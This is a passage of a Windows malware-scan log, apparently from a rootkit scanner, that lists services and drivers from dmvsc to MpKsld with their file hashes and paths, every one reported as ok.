09:28:06.0755 0x0a3c  [ 2A958EF85DB1B61FFCA65044FA4BCE9E, C83511685EE1CE85A5ADF9B5BE96C375A521601F66024BDC3EE044C0B6E85D69 ] dmvsc           C:\Windows\system32\drivers\dmvsc.sys
09:28:06.0760 0x0a3c  dmvsc - ok
09:28:06.0809 0x0a3c  [ 33EF4861F19A0736B11314AAD9AE28D0, 4C4B84365D85758E3263B88F157D8B086B392C6F1EA5F0F3DB6BF87EF90248EC ] Dnscache        C:\Windows\System32\dnsrslvr.dll
09:28:06.0819 0x0a3c  Dnscache - ok
09:28:06.0859 0x0a3c  [ 366BA8FB4B7BB7435E3B9EACB3843F67, 65B7C61ACF34F1F0149045AA9E09A3F917A927963237A385A914D0B80551DC31 ] dot3svc         C:\Windows\System32\dot3svc.dll
09:28:06.0873 0x0a3c  dot3svc - ok
09:28:06.0913 0x0a3c  [ 8EC04CA86F1D68DA9E11952EB85973D6, 2E3FBC2D683D1274E8BC45EEEA87D43B77EDDCAAF0D453296D9FDA6B9D717071 ] DPS             C:\Windows\system32\dps.dll
09:28:06.0923 0x0a3c  DPS - ok
09:28:06.0963 0x0a3c  [ B918E7C5F9BF77202F89E1A9539F2EB4, C589A37DE50BBEF22E2DAA9682EA43147F614AA1AF7DAAA942BA5FC192313A0B ] drmkaud         C:\Windows\system32\drivers\drmkaud.sys
09:28:06.0966 0x0a3c  drmkaud - ok
09:28:07.0052 0x0a3c  [ 71BC35067CABC02C9453AEAA42B2E43E, 713B19F2C08EA5E4C087F7A74A8856932CF33E19D63384823DD4E02ED8798619 ] DXGKrnl         C:\Windows\System32\drivers\dxgkrnl.sys
09:28:07.0108 0x0a3c  DXGKrnl - ok
09:28:07.0161 0x0a3c  [ 8600142FA91C1B96367D3300AD0F3F3A, 5713625E27DF11FAAFDA7AC79899A6AD813166E167088FA990EC5DE87DBE83DF ] EapHost         C:\Windows\System32\eapsvc.dll
09:28:07.0171 0x0a3c  EapHost - ok
09:28:07.0378 0x0a3c  [ 024E1B5CAC09731E4D868E64DBFB4AB0, AB0826A74BBEE5B7A1B035861B665C79BC98305CFC7D82BEF420558FBD3EE994 ] ebdrv           C:\Windows\system32\drivers\evbdx.sys
09:28:07.0558 0x0a3c  ebdrv - ok
09:28:07.0611 0x0a3c  [ 803B370865D907EA21DC0C2B6A8936B5, E98F0BA1D94786E061A3EA2CC76041FF6BE0ADF47C6205D5572C03BF0E29CA78 ] EFS             C:\Windows\System32\lsass.exe
09:28:07.0617 0x0a3c  EFS - ok
09:28:07.0697 0x0a3c  [ A8C362018EFC87BEB013EE28F29C0863, 07971C681FBD391C0BA0172618AF8AD77520182207F1C57F134B34D6A113857F ] ehRecvr         C:\Windows\ehome\ehRecvr.exe
09:28:07.0741 0x0a3c  ehRecvr - ok
09:28:07.0782 0x0a3c  [ D389BFF34F80CAEDE417BF9D1507996A, 12859B9925D7A4631DE61A820922F43F56ED23C2AF014CBF36322685E5CF641E ] ehSched         C:\Windows\ehome\ehsched.exe
09:28:07.0789 0x0a3c  ehSched - ok
09:28:07.0821 0x0a3c  [ 95E267BB3750C88F6AF5D932ED641DB8, 1E52B8AB3A2E01A7E4F8BDF8FFE0DD20B054C949A1EB2C28840CF17678DC7B1D ] EloBus          C:\Windows\system32\drivers\EloBus.sys
09:28:07.0826 0x0a3c  EloBus - ok
09:28:07.0869 0x0a3c  [ 29DF989B2BB3AF180B7C8EF406C25C44, 07FCAB03975794926D49FFC2CB58FBD00DF734CC2F3127D263357A7A4DD439D6 ] EloSer          C:\Windows\system32\drivers\EloSerG2.sys
09:28:07.0877 0x0a3c  EloSer - ok
09:28:07.0985 0x0a3c  [ 0ED67910C8C326796FAA00B2BF6D9D3C, 97FAA7627A162B0AEC15545E0165D13355D535B4157604BB87F8EEB72ECD24A8 ] elxstor         C:\Windows\system32\drivers\elxstor.sys
09:28:08.0052 0x0a3c  elxstor - ok
09:28:08.0092 0x0a3c  [ 8FC3208352DD3912C94367A206AB3F11, 69B65C12BDADD4B730508674B1B77C5496612B4ACCC447DB9AFE49ADEA8CBF02 ] ErrDev          C:\Windows\system32\drivers\errdev.sys
09:28:08.0094 0x0a3c  ErrDev - ok
09:28:08.0172 0x0a3c  [ F6916EFC29D9953D5D0DF06882AE8E16, ED41893960018D5EC2F7829B1DE4B6967D9FD074D60B11B9EB854E3E0948EC24 ] EventSystem     C:\Windows\system32\es.dll
09:28:08.0206 0x0a3c  EventSystem - ok
09:28:08.0247 0x0a3c  [ 2DC9108D74081149CC8B651D3A26207F, 75CB47923A867DDAC512701CE71DFCFC340FC3A2E27F4255D0836A1FBC463176 ] exfat           C:\Windows\system32\drivers\exfat.sys
09:28:08.0257 0x0a3c  exfat - ok
09:28:08.0291 0x0a3c  [ 7E0AB74553476622FB6AE36F73D97D35, 41463A255FDA1D550B3385EC7C73ABC343B1BBBE9CEE4DF9F2A8B3E7338C4947 ] fastfat         C:\Windows\system32\drivers\fastfat.sys
09:28:08.0300 0x0a3c  fastfat - ok
09:28:08.0360 0x0a3c  [ 967EA5B213E9984CBE270205DF37755B, 43153E23210B03FAE16897D62D55B8742F834EDC695F8401EAB5DE307F62602D ] Fax             C:\Windows\system32\fxssvc.exe
09:28:08.0404 0x0a3c  Fax - ok
09:28:08.0434 0x0a3c  [ E817A017F82DF2A1F8CFDBDA29388B29, 4CC9320A21E6FEA2D16C48D6BEA14391B695BD541A3C5FDDAEEE086A414FC837 ] fdc             C:\Windows\system32\drivers\fdc.sys
09:28:08.0438 0x0a3c  fdc - ok
09:28:08.0460 0x0a3c  [ F3222C893BD2F5821A0179E5C71E88FB, A85B947249DBB986358CCD4B158DD58A9301F074F3C6CCCDEF2D01F432E59D1B ] fdPHost         C:\Windows\system32\fdPHost.dll
09:28:08.0465 0x0a3c  fdPHost - ok
09:28:08.0483 0x0a3c  [ 7DBE8CBFE79EFBDEB98C9FB08D3A9A5B, 0E76C29D2A974A3F2FBFCB63D066D4136B78E02F6B1F579B1865CA7A76193987 ] FDResPub        C:\Windows\system32\fdrespub.dll
09:28:08.0487 0x0a3c  FDResPub - ok
09:28:08.0521 0x0a3c  [ 6CF00369C97F3CF563BE99BE983D13D8, F65F35324A2FB9DFB533B1C4D089D990CC242218FE83414329D07B786D8EFF33 ] FileInfo        C:\Windows\system32\drivers\fileinfo.sys
09:28:08.0525 0x0a3c  FileInfo - ok
09:28:08.0541 0x0a3c  [ 42C51DC94C91DA21CB9196EB64C45DB9, 388C68D12ECC8FFE3116FEAAF4DB7B80CF4A3F97E935788DD21C6ADE2369F635 ] Filetrace       C:\Windows\system32\drivers\filetrace.sys
09:28:08.0550 0x0a3c  Filetrace - ok
09:28:08.0576 0x0a3c  [ 87907AA70CB3C56600F1C2FB8841579B, CA1CD82A1CD453617CE5EA431A1836997F14E3580554E8A516D9FE1E9926D979 ] flpydisk        C:\Windows\system32\drivers\flpydisk.sys
09:28:08.0579 0x0a3c  flpydisk - ok
09:28:08.0628 0x0a3c  [ 7520EC808E0C35E0EE6F841294316653, 6EC65511B4838A7172A8F89E35C2F9DF4F0BFCE3BE12EDA790F3EB567102FF67 ] FltMgr          C:\Windows\system32\drivers\fltmgr.sys
09:28:08.0638 0x0a3c  FltMgr - ok
09:28:08.0725 0x0a3c  [ E12C4928B32ACE04610259647F072635, B71B9C2DF45F33C4DAC88435129B08B0BCDBBE82E8C3AD0A95F00137CC8B619F ] FontCache       C:\Windows\system32\FntCache.dll
09:28:08.0792 0x0a3c  FontCache - ok
09:28:08.0854 0x0a3c  [ E56F39F6B7FDA0AC77A79B0FD3DE1A2F, DBED26852B99B362152DA9CD4F31A1883EF6F9B496F3CF3772A197BA72DB61DA ] FontCache3.0.0.0 C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe
09:28:08.0858 0x0a3c  FontCache3.0.0.0 - ok
09:28:08.0944 0x0a3c  [ A8F5529BA69D444DFE06C439DE503119, 1DD1B8C39E727F685F1E4C9EC2656224EDF922D2EC02134F6CA3D44A14F9C0E9 ] FPOSCreditCard5 C:\POS\FPOS5\Bin\CreditCardService.exe
09:28:08.0949 0x0a3c  FPOSCreditCard5 - ok
09:28:08.0994 0x0a3c  [ EC0D6B9099CB25E1E2EAC5F4C350C6CB, E94A69D72E6E0D8AA0BCF55305BE510E2C174CFE94B3078D5FCC44EB17E2F665 ] FPOSUpdate5     C:\POS\FPOS5\Bin\UpdEng2.exe
09:28:09.0038 0x0a3c  FPOSUpdate5 - ok
09:28:09.0064 0x0a3c  [ 1A16B57943853E598CFF37FE2B8CBF1D, 87609F46F3B8123552141FD70866E895220B1BBD92BC2B580CAF49201AA0197E ] FsDepends       C:\Windows\system32\drivers\FsDepends.sys
09:28:09.0072 0x0a3c  FsDepends - ok
09:28:09.0104 0x0a3c  [ 7DAE5EBCC80E45D3253F4923DC424D05, 8A2C4D5591509B0B0A44583520617A9AE34F32BB6E68A012A7D7870ED24F703A ] Fs_Rec          C:\Windows\system32\drivers\Fs_Rec.sys
09:28:09.0107 0x0a3c  Fs_Rec - ok
09:28:09.0149 0x0a3c  [ E306A24D9694C724FA2491278BF50FDB, 1D246B9C28550640EACBF8CF9DC980FD75106B92832D392FEBEF0C7012353091 ] fvevol          C:\Windows\system32\DRIVERS\fvevol.sys
09:28:09.0160 0x0a3c  fvevol - ok
09:28:09.0209 0x0a3c  [ 65EE0C7A58B65E74AE05637418153938, 0E1A398ADD8411AF4CCC3344D67BE1B261320C58328BD5C5855A357476FAEBEF ] gagp30kx        C:\Windows\system32\drivers\gagp30kx.sys
09:28:09.0213 0x0a3c  gagp30kx - ok
09:28:09.0287 0x0a3c  [ E897EAF5ED6BA41E081060C9B447A673, A428DC68516F19C6C53A8B62E4BDB2587E70FB751B9D77700B6B147D347DA157 ] gpsvc           C:\Windows\System32\gpsvc.dll
09:28:09.0334 0x0a3c  gpsvc - ok
09:28:09.0366 0x0a3c  [ C44E3C2BAB6837DB337DDEE7544736DB, 88A24FF7D2FECCEAFFD421B2039A0FB623DA47A6B220B80EF1E52DD26D9E222D ] hcw85cir        C:\Windows\system32\drivers\hcw85cir.sys
09:28:09.0370 0x0a3c  hcw85cir - ok
09:28:09.0413 0x0a3c  [ A5EF29D5315111C80A5C1ABAD14C8972, A181DA72E946F121C3F4A19438C547B0BFD15138AB1DB5465945EC89DF1F6B0A ] HdAudAddService C:\Windows\system32\drivers\HdAudio.sys
09:28:09.0447 0x0a3c  HdAudAddService - ok
09:28:09.0490 0x0a3c  [ 9036377B8A6C15DC2EEC53E489D159B5, 1E56D2ACFE92E6DF96D755B05C63D580EED82C210F075C8623E138BEE6BCD41B ] HDAudBus        C:\Windows\system32\drivers\HDAudBus.sys
09:28:09.0497 0x0a3c  HDAudBus - ok
09:28:09.0534 0x0a3c  [ 1D58A7F3E11A9731D0EAAAA8405ACC36, 7056FA18B86FBD52C4A6092D80476C02553EA053D6A0BEDB01A2FA5E152D5215 ] HidBatt         C:\Windows\system32\drivers\HidBatt.sys
09:28:09.0537 0x0a3c  HidBatt - ok
09:28:09.0575 0x0a3c  [ 89448F40E6DF260C206A193A4683BA78, 71E0FCC32AE6FF8DFF420DB0383D6A200E1EAE14BD2E32453F92CE18B31C1F3C ] HidBth          C:\Windows\system32\drivers\hidbth.sys
09:28:09.0581 0x0a3c  HidBth - ok
09:28:09.0609 0x0a3c  [ CF50B4CF4A4F229B9F3C08351F99CA5E, B97843620AF80FF0EC8F2C438255C0A42A756C6314FAF3DEF415DE16E14C108F ] HidIr           C:\Windows\system32\drivers\hidir.sys
09:28:09.0613 0x0a3c  HidIr - ok
09:28:09.0656 0x0a3c  [ 2BC6F6A1992B3A77F5F41432CA6B3B6B, 2AF3312F1C8C8923C0A29AA5DAE57CE269417E53DEA2F0CCCC8DB57029698FE1 ] hidserv         C:\Windows\system32\hidserv.dll
09:28:09.0663 0x0a3c  hidserv - ok
09:28:09.0708 0x0a3c  [ 10C19F8290891AF023EAEC0832E1EB4D, E208553029488A6EE2F5216CC9FE5F93E9931A94C0D0625253BB159E30642853 ] HidUsb          C:\Windows\system32\DRIVERS\hidusb.sys
09:28:09.0712 0x0a3c  HidUsb - ok
09:28:09.0760 0x0a3c  [ 196B4E3F4CCCC24AF836CE58FACBB699, 7A2E1F603A073421FA0987EFB96647F1F0F2D4E0C82AA62EBC041585DA811DAF ] hkmsvc          C:\Windows\system32\kmsvc.dll
09:28:09.0768 0x0a3c  hkmsvc - ok
09:28:09.0814 0x0a3c  [ 6658F4404DE03D75FE3BA09F7ABA6A30, E51D9C1580A283EB862F09B73AAE1B647DD683A53F3DD99834222F12DD15E40F ] HomeGroupListener C:\Windows\system32\ListSvc.dll
09:28:09.0828 0x0a3c  HomeGroupListener - ok
09:28:09.0888 0x0a3c  [ DBC02D918FFF1CAD628ACBE0C0EAA8E8, 02121800D9062692C102475876AE8143EBE46D855E8328B8CDCFE6A2F0D19696 ] HomeGroupProvider C:\Windows\system32\provsvc.dll
09:28:09.0910 0x0a3c  HomeGroupProvider - ok
09:28:09.0954 0x0a3c  [ 295FDC419039090EB8B49FFDBB374549, 670E8015FD374640C6570F56F7FE8DE4D8F92E7A8072F5D1B2B95D0BD699CEF7 ] HpSAMD          C:\Windows\system32\drivers\HpSAMD.sys
09:28:09.0959 0x0a3c  HpSAMD - ok
09:28:10.0019 0x0a3c  [ 871917B07A141BFF43D76D8844D48106, 30C702008D0EE57D63F74864967DD19A55A268E77E42B5B3CC73037AD51D2987 ] HTTP            C:\Windows\system32\drivers\HTTP.sys
09:28:10.0053 0x0a3c  HTTP - ok
09:28:10.0079 0x0a3c  [ 0C4E035C7F105F1299258C90886C64C5, CFB4FBE7B28058E6D3E6E508CF3C1645F6AAE0AFEB4C5364835B9C42311DF0D4 ] hwpolicy        C:\Windows\system32\drivers\hwpolicy.sys
09:28:10.0081 0x0a3c  hwpolicy - ok
09:28:10.0118 0x0a3c  [ F151F0BDC47F4A28B1B20A0818EA36D6, 84B24B5796D9F70A8C37773F5484A4606CC7908370CCD942627ACBEDC4952D79 ] i8042prt        C:\Windows\system32\drivers\i8042prt.sys
09:28:10.0124 0x0a3c  i8042prt - ok
09:28:10.0190 0x0a3c  [ F4037A3FEDB92DD97C95F320766EA5C9, 3872166AA17E9C19D9F5BBCBC6CA202F6D5CCB1F9E04ED2AA0D43F642B9C85FD ] iaStor          C:\Windows\system32\drivers\iaStor.sys
09:28:10.0207 0x0a3c  iaStor - ok
09:28:10.0259 0x0a3c  [ 5CD5F9A5444E6CDCB0AC89BD62D8B76E, 72870092A80C6DAE0105025B0ED8B607E98BA81E59298364A7FE4C9C56C68FF0 ] iaStorV         C:\Windows\system32\drivers\iaStorV.sys
09:28:10.0291 0x0a3c  iaStorV - ok
09:28:10.0380 0x0a3c  [ C521D7EB6497BB1AF6AFA89E322FB43C, BDDCFCBB5B76A9295669B5AC9F732D6127199ED5C300770B554C4E4794F66BB7 ] idsvc           C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
09:28:10.0437 0x0a3c  idsvc - ok
09:28:10.0466 0x0a3c  IEEtwCollectorService - ok
09:28:10.0578 0x0a3c  [ 72A75B01371384ECBCFC6AD2AF6B9389, 8B716014C1F9EDB2A134CCF29F21B31E23C2585C708BAFFFFD767C92C8AE2960 ] igddim32        C:\Windows\system32\DRIVERS\igddim32.sys
09:28:10.0657 0x0a3c  igddim32 - ok
09:28:10.0710 0x0a3c  [ 6B78789287D43615E7908CA31C0D5D6D, 776C6BEBDE6BCA4D5AB943F1DFC5B22CF7FE8113052995FBEAE0FB24D15614DF ] igdkmd32        C:\Windows\system32\DRIVERS\igdkmd32.sys
09:28:10.0743 0x0a3c  igdkmd32 - ok
09:28:10.0780 0x0a3c  [ 4173FF5708F3236CF25195FECD742915, 0A9C0701DF6EAC6602BE342FC13C7950EF04BB5BDF7D96C2C5DABBD2A29AA55D ] iirsp           C:\Windows\system32\drivers\iirsp.sys
09:28:10.0784 0x0a3c  iirsp - ok
09:28:10.0857 0x0a3c  [ B9C54120F46392100478F58F374E5709, A28EE8B0988F580D5984E815FC78DF41B169260814234AA0E453375542D0957B ] IKEEXT          C:\Windows\System32\ikeext.dll
09:28:10.0904 0x0a3c  IKEEXT - ok
09:28:11.0184 0x0a3c  [ 7754EF56ADCED44D63129E8D7252DB87, A2A04514BB722106FE6DA2C01987E39AF07BF835CC892C950DDDBB4DAF9AECB6 ] IntcAzAudAddService C:\Windows\system32\drivers\RTKVHDA.sys
09:28:11.0412 0x0a3c  IntcAzAudAddService - ok
09:28:11.0475 0x0a3c  [ 8F4D251F1EA15FA97E8399128A72CC83, 210F724C2586DA4EA847439EDAAA7ABA170435A88698C077ED31D057C0997164 ] IntcDAud        C:\Windows\system32\DRIVERS\IntcDAud.sys
09:28:11.0497 0x0a3c  IntcDAud - ok
09:28:11.0536 0x0a3c  [ A0F12F2C9BA6C72F3987CE780E77C130, 5F53DF8BE1621AA7DFB655CFD9C95E0AFA1AD3CE2E290E19D7B7FB3C6E380034 ] intelide        C:\Windows\system32\drivers\intelide.sys
09:28:11.0538 0x0a3c  intelide - ok
09:28:11.0570 0x0a3c  [ 3B514D27BFC4ACCB4037BC6685F766E0, F12D7AC62F8550E6F33B28AD751D8413AB7FFEF963242D99FFA76CE8A48B027A ] intelppm        C:\Windows\system32\drivers\intelppm.sys
09:28:11.0574 0x0a3c  intelppm - ok
09:28:11.0604 0x0a3c  [ ACB364B9075A45C0736E5C47BE5CAE19, 202F77C659103D2D0E787B8CB0A23BE32EA5AA2E6B3B0A0F0A8DFA906AB3C0C0 ] IPBusEnum       C:\Windows\system32\ipbusenum.dll
09:28:11.0613 0x0a3c  IPBusEnum - ok
09:28:11.0642 0x0a3c  [ 709D1761D3B19A932FF0238EA6D50200, 0A9D2C3A6E91CA45540555B40CB4E2DF3EBE98C1D164C4EECEE20C86782F5823 ] IpFilterDriver  C:\Windows\system32\DRIVERS\ipfltdrv.sys
09:28:11.0647 0x0a3c  IpFilterDriver - ok
09:28:11.0721 0x0a3c  [ 58F67245D041FBE7AF88F4EAF79DF0FA, 67468D6A46FF4D87AD321BFEA42F2FC843D09AA292A119C76D4D795D06028F96 ] iphlpsvc        C:\Windows\System32\iphlpsvc.dll
09:28:11.0766 0x0a3c  iphlpsvc - ok
09:28:11.0802 0x0a3c  [ 4BD7134618C1D2A27466A099062547BF, 20284ABEF4433A59E2981F4143CAEC67DC990864FE0B9E3DC70EE0B88539E964 ] IPMIDRV         C:\Windows\system32\drivers\IPMIDrv.sys
09:28:11.0808 0x0a3c  IPMIDRV - ok
09:28:11.0835 0x0a3c  [ A5FA468D67ABCDAA36264E463A7BB0CD, EDB828D596E43372F97DAE1AADA46428C4C45FB80646DDC64FAD5F25C826CF63 ] IPNAT           C:\Windows\system32\drivers\ipnat.sys
09:28:11.0842 0x0a3c  IPNAT - ok
09:28:11.0877 0x0a3c  [ 42996CFF20A3084A56017B7902307E9F, 688176DAB91BE569280E4822E4C5BDE755794D293591C53F8047AD59C441751D ] IRENUM          C:\Windows\system32\drivers\irenum.sys
09:28:11.0880 0x0a3c  IRENUM - ok
09:28:11.0900 0x0a3c  [ 1F32BB6B38F62F7DF1A7AB7292638A35, 86522358680FBB1CEBC56B4D139290689BB0F71A3EC78CE883E4D75D0B37586F ] isapnp          C:\Windows\system32\drivers\isapnp.sys
09:28:11.0905 0x0a3c  isapnp - ok
09:28:11.0956 0x0a3c  [ EB34CE31FABD4DC4343FD2AD16D2CAF9, D21C91227A15DA89ECF522345D0AB80B3B7FC24A230596DABDB8BD3B7554CE8C ] iScsiPrt        C:\Windows\system32\drivers\msiscsi.sys
09:28:11.0970 0x0a3c  iScsiPrt - ok
09:28:12.0010 0x0a3c  [ ADEF52CA1AEAE82B50DF86B56413107E, A3AE1E96B04AC81665ABBD3CB267DFB3F78376DAE18FB0DBD447908DDAAA22D2 ] kbdclass        C:\Windows\system32\DRIVERS\kbdclass.sys
09:28:12.0014 0x0a3c  kbdclass - ok
09:28:12.0037 0x0a3c  [ 9E3CED91863E6EE98C24794D05E27A71, 90CF59F20E14E4A5A793266805E82BF7AE1F0CF4C7BAB1FD2EEF3B53C5DF770F ] kbdhid          C:\Windows\system32\DRIVERS\kbdhid.sys
09:28:12.0040 0x0a3c  kbdhid - ok
09:28:12.0061 0x0a3c  [ 803B370865D907EA21DC0C2B6A8936B5, E98F0BA1D94786E061A3EA2CC76041FF6BE0ADF47C6205D5572C03BF0E29CA78 ] KeyIso          C:\Windows\system32\lsass.exe
09:28:12.0066 0x0a3c  KeyIso - ok
09:28:12.0106 0x0a3c  [ F286830298323272260332D6ABC905C1, FF4CD182A95CA53119B228690D682EE9214BE131A0DBCB09B6189FBEBBFF902C ] KSecDD          C:\Windows\system32\Drivers\ksecdd.sys
09:28:12.0110 0x0a3c  KSecDD - ok
09:28:12.0135 0x0a3c  [ D7C760D57B1656DD748B9E4AB6CB5A51, F8AE4185A6A9F7005DEFF1FDC03F395C6189825B482B8C650637FD29DE93AB68 ] KSecPkg         C:\Windows\system32\Drivers\ksecpkg.sys
09:28:12.0142 0x0a3c  KSecPkg - ok
09:28:12.0194 0x0a3c  [ 89A7B9CC98D0D80C6F31B91C0A310FCD, 4583CAEEE0D50C0C7CE955E533FDA063CDC37B69033D41EF22EF1BA242E4C747 ] KtmRm           C:\Windows\system32\msdtckrm.dll
09:28:12.0241 0x0a3c  KtmRm - ok
09:28:12.0288 0x0a3c  [ D64AF876D53ECA3668BB97B51B4E70AB, D5C07C019BFEAFBEDC29AB5060356A3B07449712B21B50E03378BEF04AF180F9 ] LanmanServer    C:\Windows\system32\srvsvc.dll
09:28:12.0322 0x0a3c  LanmanServer - ok
09:28:12.0352 0x0a3c  [ 58405E4F68BA8E4057C6E914F326ABA2, C3E6519A1A38F1B3597D4391E42ABFE8F1F5E86256C4B3BD876CDAD9BB68B0A6 ] LanmanWorkstation C:\Windows\System32\wkssvc.dll
09:28:12.0365 0x0a3c  LanmanWorkstation - ok
09:28:12.0419 0x0a3c  [ 05C10E70B437841F31E1BFA8812895BA, BDBB4E35231954B342D8BC95F36633BEA3C95663B0247CFE848920587DDA5786 ] libusb0         C:\Windows\system32\DRIVERS\libusb0.sys
09:28:12.0463 0x0a3c  libusb0 - ok
09:28:12.0498 0x0a3c  [ 5700673E13A2117FA3B9020C852C01E2, 6684A2905EE8C438F2A64BE47E51A54D287B08DEFB8E0AE7FC2809D845EE3C5F ] lltdsvc         C:\Windows\System32\lltdsvc.dll
09:28:12.0520 0x0a3c  lltdsvc - ok
09:28:12.0542 0x0a3c  [ 55CA01BA19D0006C8F2639B6C045E08B, 4DBBDC820C514DB18CC13F8EE178F8C4E39C295C6E3C255416C235553CE7BDC1 ] lmhosts         C:\Windows\System32\lmhsvc.dll
09:28:12.0548 0x0a3c  lmhosts - ok
09:28:12.0639 0x0a3c  [ 46945556080D95005DC909C82E1992C0, 16D75F0CF7CFE4859C9755CEDFF365F01513D8DB235DF4A9DE1D0B8C110FE761 ] LMIGuardianSvc  C:\Program Files\LogMeIn\x86\LMIGuardianSvc.exe
09:28:12.0656 0x0a3c  LMIGuardianSvc - ok
09:28:12.0694 0x0a3c  [ 26E3BEC8F2F0CFAF9FFE4C7AEF1BC049, CFB86B860FF4F856DA75EB132E06B77C71DC5D994799C08EDC01F2CA8B47AB44 ] LMIInfo         C:\Program Files\LogMeIn\x86\RaInfo.sys
09:28:12.0696 0x0a3c  LMIInfo - ok
09:28:12.0728 0x0a3c  [ 6ECA0044A67C34B47613D1679B0D614F, D45B6D82466A9EE8732FA2776AA2B07F90372BDF6D91B84D1F73098A19DD2B41 ] LMIMaint        C:\Program Files\LogMeIn\x86\RaMaint.exe
09:28:12.0739 0x0a3c  LMIMaint - ok
09:28:12.0756 0x0a3c  [ 4477689E2D8AE6B78BA34C9AF4CC1ED1, 0BC8AF546901E6C20611C5250BD65ACD0C4A8613BD8F8835F0D4680B5777F051 ] lmimirr         C:\Windows\system32\DRIVERS\lmimirr.sys
09:28:12.0828 0x0a3c  lmimirr - ok
09:28:12.0860 0x0a3c  LMIRfsClientNP - ok
09:28:12.0907 0x0a3c  [ 3FAA563DDF853320F90259D455A01D79, D81B5FCC0CBCF9CE18E44A31071D357B12F5016159E24954E50E68D80C9F61B8 ] LMIRfsDriver    C:\Windows\system32\drivers\LMIRfsDriver.sys
09:28:12.0910 0x0a3c  LMIRfsDriver - ok
09:28:12.0994 0x0a3c  [ 432618FA75B61059D2C57D6A7E55147A, 0E7D771AE9F98667A68C8C07A664D70B71B78EC08D7FEA92AD979E1E049EC0B1 ] LogMeIn         C:\Program Files\LogMeIn\x86\LogMeIn.exe
09:28:13.0012 0x0a3c  LogMeIn - ok
09:28:13.0084 0x0a3c  [ EB119A53CCF2ACC000AC71B065B78FEF, 1FD60735C4945AE565C223F0B47EAF9602D8777E3D15600914C1A9D761215AF9 ] LSI_FC          C:\Windows\system32\drivers\lsi_fc.sys
09:28:13.0090 0x0a3c  LSI_FC - ok
09:28:13.0124 0x0a3c  [ 8ADE1C877256A22E49B75D1CC9161F9C, 3D64F233DC866537E50549A7C1A2B40A954055B22F0BDA39825B04C38C607CB7 ] LSI_SAS         C:\Windows\system32\drivers\lsi_sas.sys
09:28:13.0130 0x0a3c  LSI_SAS - ok
09:28:13.0155 0x0a3c  [ DC9DC3D3DAA0E276FD2EC262E38B11E9, A264990857CBC74036799E17A087130626C0A09BE19879019BAF2D761C62AECC ] LSI_SAS2        C:\Windows\system32\drivers\lsi_sas2.sys
09:28:13.0159 0x0a3c  LSI_SAS2 - ok
09:28:13.0203 0x0a3c  [ 0A036C7D7CAB643A7F07135AC47E0524, 2F662D07FCB74B8D493156DB555EAA90A47E93CF14C7B30039D2FE47EB8682B8 ] LSI_SCSI        C:\Windows\system32\drivers\lsi_scsi.sys
09:28:13.0210 0x0a3c  LSI_SCSI - ok
09:28:13.0248 0x0a3c  [ 6703E366CC18D3B6E534F5CF7DF39CEE, 7396B9AF938284D99EC51206A7B2FA4A0DC10A493DCE6707818B03A7473782C4 ] luafv           C:\Windows\system32\drivers\luafv.sys
09:28:13.0253 0x0a3c  luafv - ok
09:28:13.0290 0x0a3c  [ BFB9EE8EE977EFE85D1A3105ABEF6DD1, D2A84EBF0C0B7A14AD432FD2EF43CC12300027AEA3FA4075659FB088AB62B588 ] Mcx2Svc         C:\Windows\system32\Mcx2Svc.dll
09:28:13.0300 0x0a3c  Mcx2Svc - ok
09:28:13.0320 0x0a3c  [ 0FFF5B045293002AB38EB1FD1FC2FB74, 49071B565FD5B2DE43EC00D8518C3BE70843F38919E82F13104B8C1FAFB20374 ] megasas         C:\Windows\system32\drivers\megasas.sys
09:28:13.0324 0x0a3c  megasas - ok
09:28:13.0364 0x0a3c  [ DCBAB2920C75F390CAF1D29F675D03D6, 85C3A7A010BEA5E3C6179161B295F2CB900A6A214833A5F87A4327392880E2BB ] MegaSR          C:\Windows\system32\drivers\MegaSR.sys
09:28:13.0384 0x0a3c  MegaSR - ok
09:28:13.0409 0x0a3c  [ 146B6F43A673379A3C670E86D89BE5EA, C4412DCF80DE6B55466F399413271364F14BC0819C224AA161EDDC31A9775440 ] MMCSS           C:\Windows\system32\mmcss.dll
09:28:13.0416 0x0a3c  MMCSS - ok
09:28:13.0442 0x0a3c  [ F001861E5700EE84E2D4E52C712F4964, F4DC5AEED6F34D76CCEF360862CC47EF71097BE0813C8CE04EE5F0DB387DFFAE ] Modem           C:\Windows\system32\drivers\modem.sys
09:28:13.0447 0x0a3c  Modem - ok
09:28:13.0488 0x0a3c  [ 79D10964DE86B292320E9DFE02282A23, 52714827B7EEDACA55326A4E4F6158D4942DFAA3BACDE303A2F569BF3F4FAA72 ] monitor         C:\Windows\system32\DRIVERS\monitor.sys
09:28:13.0491 0x0a3c  monitor - ok
09:28:13.0515 0x0a3c  [ FB18CC1D4C2E716B6B903B0AC0CC0609, F10CCA63493782B16DE6B96B94A27078DBE68AECEF34FDF840CFF86D2C6E3C5E ] mouclass        C:\Windows\system32\DRIVERS\mouclass.sys
09:28:13.0519 0x0a3c  mouclass - ok
09:28:13.0561 0x0a3c  [ 2C388D2CD01C9042596CF3C8F3C7B24D, B2FB72272BB01AEDA4047B57C943B7E9BD8A6497854F8CC34672AAA592D0A703 ] mouhid          C:\Windows\system32\DRIVERS\mouhid.sys
09:28:13.0564 0x0a3c  mouhid - ok
09:28:13.0586 0x0a3c  [ FC8771F45ECCCFD89684E38842539B9B, 806DDF2B4830CA866582FE74A521BB7DF26CA0E19013DAF584D3677FB48CC77A ] mountmgr        C:\Windows\system32\drivers\mountmgr.sys
09:28:13.0591 0x0a3c  mountmgr - ok
09:28:13.0661 0x0a3c  [ 8072A7BB35D92CC621AC2605EEF79BC4, 68F61BE84A5032CEC24F04C90DACA1AE78F3744016389BE2345256B26E44E09A ] MpFilter        C:\Windows\system32\DRIVERS\MpFilter.sys
09:28:13.0674 0x0a3c  MpFilter - ok
09:28:13.0714 0x0a3c  [ 2D699FB6E89CE0D8DA14ECC03B3EDFE0, D3D903EEA465D77345AAC9B9F02CDEADF4831212EA2DE4FCA33BEE26EBB47420 ] mpio            C:\Windows\system32\drivers\mpio.sys
09:28:13.0722 0x0a3c  mpio - ok
09:28:13.0824 0x0a3c  [ 65C34426C83EFA32D48380A97717997B, CD7EB6BFBB0BE382BA21055460D9A72323F09AF3194A22D8EDB28D5DB3BAE8E7 ] MpKsld57ec004   c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{C2B3D72C-220B-4FF7-A4B7-3383D6F5FCDA}\MpKsld57ec004.sys
09:28:13.0827 0x0a3c  MpKsld57ec004 - ok
